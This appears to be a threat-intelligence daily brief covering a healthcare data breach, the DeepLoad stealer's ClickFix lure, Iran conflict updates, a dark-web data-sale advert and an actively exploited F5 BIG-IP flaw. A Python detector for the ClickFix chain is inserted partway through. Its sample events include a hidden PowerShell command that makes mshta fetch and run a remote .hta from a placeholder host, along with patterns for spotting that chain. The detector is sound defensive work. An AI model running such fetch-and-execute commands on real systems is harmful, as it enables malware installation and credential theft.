ZeroFox Daily Intelligence Brief - March 31, 2026
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Healthcare Tech Provider CareCloud Discloses Data Breach
- DeepLoad Exploits User Interaction to Deploy Stealer Malware
- Iran SITREP: Kuwait Oil Tanker Fire, Chinese Containers Cross Strait of Hormuz
Healthcare Tech Provider CareCloud Discloses Data Breach
What we know: U.S.-based healthcare software company CareCloud has disclosed a data breach affecting its electronic health record environment, which also caused an eight-hour network disruption on March 16, 2026.
Context: The company has since fully restored all functionality and data access in the impacted environment. The affected environment held patient health records for CareCloud customers. CareCloud is a software vendor to hospitals and medical practices, serving over 45,000 providers.
Analyst note: Personally identifiable information (PII) and protected health information (PHI) records from across the United States are very likely to be exposed in this incident. Threat actors are likely to extort CareCloud and/or its customers. Furthermore, exposed individuals are likely to be targeted in insurance fraud, blackmail, phishing, and social engineering attacks.
DeepLoad Exploits User Interaction to Deploy Stealer Malware
Source: https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
What we know: A new malware strain called “DeepLoad” uses the ClickFix social engineering tactic to infect victim systems and steal credentials through a stealer and a malicious browser extension. The attack begins with a ClickFix lure that tricks users into executing a PowerShell command, which then uses the legitimate Windows tool mshta[.]exe to download and run an obfuscated loader.
Context: DeepLoad steals credentials by extracting saved browser passwords and deploying a persistent malicious extension that captures login details in real time. In February 2026, threat actor “MysteryHack” advertised DeepLoad on the dark web forum Exploit as a malware suite that replaces legitimate cryptocurrency wallet applications with malicious versions to steal funds from victims.
Analyst note: It is likely that DeepLoad’s ability to carry out real-time credential harvesting via browser extensions and stealers will see greater adoption by threat actors of varying capability to drive higher volumes of account takeovers and to target cryptocurrency holders and executives.
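As an added example (not ZeroFox's or DeepLoad's code) of how a defender could surface the ClickFix chain described above in endpoint telemetry: the Python below walks constructed, simplified process-creation records (Sysmon Event ID 1 style fields are assumed) and flags mshta.exe launched with a remote URL or spawned beneath powershell.exe.

```python
import re
from typing import Dict, Iterator, List

# Constructed sample events (not a real capture): a user pastes a ClickFix command,
# explorer.exe -> powershell.exe -> mshta.exe fetching remote content, plus one
# benign local mshta run by a deployment account that must not be flagged.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4120", "ppid": "3300", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "user": "CORP\\jdoe"},
    {"pid": "5210", "ppid": "4120",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "mshta http://example.invalid/x.hta"',
     "user": "CORP\\jdoe"},
    {"pid": "5302", "ppid": "5210", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/x.hta", "user": "CORP\\jdoe"},
    {"pid": "6001", "ppid": "900", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\ProgramData\Vendor\setup.hta", "user": "CORP\\svc-deploy"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lowercase basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: Dict[str, str], by_pid: Dict[str, Dict[str, str]]) -> Iterator[str]:
    """Yield ancestor image basenames, nearest parent first; stops on unknown pid or loop."""
    seen, ppid = set(), event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        yield image_name(by_pid[ppid]["image"])
        ppid = by_pid[ppid]["ppid"]


def find_clickfix_chains(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per mshta.exe process that matches a ClickFix-style signal."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "mshta.exe":
            continue
        reasons = []
        if REMOTE_URL.search(e["cmdline"]):          # strongest signal: remote .hta/script
            reasons.append("mshta launched with a remote URL")
        chain = list(ancestors(e, by_pid))
        if "powershell.exe" in chain:
            reasons.append("mshta spawned under powershell.exe")
            if "explorer.exe" in chain:               # pasted into Run dialog / shell
                reasons.append("powershell ancestor under explorer.exe")
        if reasons:
            findings.append({"pid": e["pid"], "user": e["user"], "reasons": reasons})
    return findings
```

Local .hta launches by a single process tree are left alone, so the remote-URL rule carries most of the weight; tune the parent checks to your environment's baseline of legitimate mshta use.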
Iran SITREP: Kuwait Oil Tanker Fire, Chinese Containers Cross Strait of Hormuz
- Kuwait said that an oil tanker was targeted in an Iranian attack while anchored at Dubai port in the United Arab Emirates. The attack sparked fire on board, raising possible oil spill concerns. No casualties have been reported.
- The video of an explosion shared by Trump early on March 31, 2026, is reportedly of a major strike carried out outside the Iranian city of Isfahan. Isfahan is home to a uranium enrichment site. Iran has not yet acknowledged the attack.
- Two Indonesian United Nations peacekeepers have been killed while on escort duty in southern Lebanon amid intensifying hostilities between Israel and Iran-backed Hezbollah. Two soldiers have been injured.
- Two Chinese container ships have reportedly passed through the Strait of Hormuz (SoH) on their second attempt after turning back the first time. Additionally, a tanker carrying crude oil bound for India also navigated the strait successfully to exit the Gulf.
DEEP AND DARK WEB INTELLIGENCE
Threat Market user APT IRAN: On March 30, 2026, ZeroFox observed a threat actor named "APT IRAN" advertising a 375 TB dataset allegedly belonging to Lockheed Martin, an American defense and aerospace manufacturer, on the Russian-language deep and dark web forum Threat Market. APT IRAN is seeking USD 598.5 million for the complete dataset, with additional offers ranging from USD 500,000 to USD 1 million for samples. The forum is likely relatively new, as ZeroFox has observed limited user activity and content. The advertisement is very likely part of psychological operations against the American military-industrial complex, as no samples have been provided and any attempt to obtain one is effectively deterred by the exorbitant price tag.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2025-53521: F5 Networks has reclassified this vulnerability in its BIG-IP Access Policy Manager from a denial-of-service flaw to a remote code execution (RCE) issue after confirming active exploitation. Attackers are exploiting the flaw to deploy webshells on unpatched systems. CISA has also added this vulnerability to its KEV catalogue. BIG-IP Access Policy Manager is a centralized access management solution that allows administrators to secure and control user access to networks, cloud services, applications, and APIs. Sustained exploitation of this vulnerability is likely to enable threat actors to access the networks and accounts of F5 Networks’ customers.
Affected products: F5 BIG-IP Access Policy Manager
Tags: DIB, tlp:green